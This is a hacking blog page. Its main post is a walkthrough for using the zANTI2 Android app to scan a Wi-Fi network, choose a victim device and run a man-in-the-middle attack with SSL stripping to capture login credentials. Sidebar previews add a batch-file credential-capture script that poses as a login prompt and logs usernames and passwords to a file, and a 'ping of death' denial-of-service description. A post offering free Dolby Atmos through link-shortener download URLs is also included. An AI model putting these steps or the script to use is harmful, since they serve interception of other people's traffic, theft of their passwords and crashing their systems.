Skip to main content

use zantu on android


Zanti 2 is a android application which is made up for network penetration testing.

What Zanti 2 can do?

Scan the whole network show alive host in the network scan port through Nmap for port Scanning Scan Service on each port and find vulnerability.Perform Brute force Attack Perform Shell Shock etc Vulnerability MITM: Man In The Middle Attack Session Hijackings SSL Striping Sniffing Packets Replace Image Redirect URL and IP Intercept and modified live download.

Disclaimer –  I recommend that you test this tutorial on a system that belongs to YOU.

 

For Demonstration :

Before install Zanti your Phone must be rooted .. In case your phone is not rooted search in the site you will find how to root android its very easy.

I used Zanti in my android device and Scan the network.I choose the Mac OSx Machine which was my laptop.After that start The MITM on and SSL strip to grab some packets and try to grab the password of that machine.in the end i successfully travel the victim into http over https and grab the login credentials.For demo kindly check the images which i posted in this post. 

 

Step 1: Scan the whole wifi network.

After that Scan i get to know all the mobile and system connected to wifi network, its also scan the all ports as you can see in the above image.

I choose the 192.168.0.100 

 

 

Step 2: After Opening the desirable victim i can see the open port and some other details as shown in below image 

As you can see in the above image Zanti2.apk successfully scan the all host in the network and after choosing the victim you want to hack or perform some testing you will see the same image in about section.

In the Attack section:

1. Password Complexity audit: Its check and brute force the password ex: default password on the victim.

 

2. MITM: It Intercept the network packets via MITM attacks.

 

3. ShellShock : its check the vulnerability exist on the victim or not.

 

4. SSL Poodle : its check the target is it vulnerable for SSL Poodle attack or not.

 

 

Its also shows the Nmap Scan Result

In My demo i used MITM Attack on the Target.

 

Step 3: After Selecting MITM attack you will see many things you can do on target machine ex: check the image below

As you can see all the attack you can do on target by using MITM, In my case i switch “ON” the MITM which is on the Right-Top.

 

In next step i turned “ON” the SSL Strip.

As you can see i turned “ON” both things together by using Zanti2.apk in the MITM attack from my android device to hack the other phone or PC.

Step 4: After that I sniff the packets ( Check the image below) and SSL Striping working perfectly and strip hotmail in HTTP .

As you can see any site is strip into http and its ready to grab the password as soon as victim enter the login details.

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, t

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment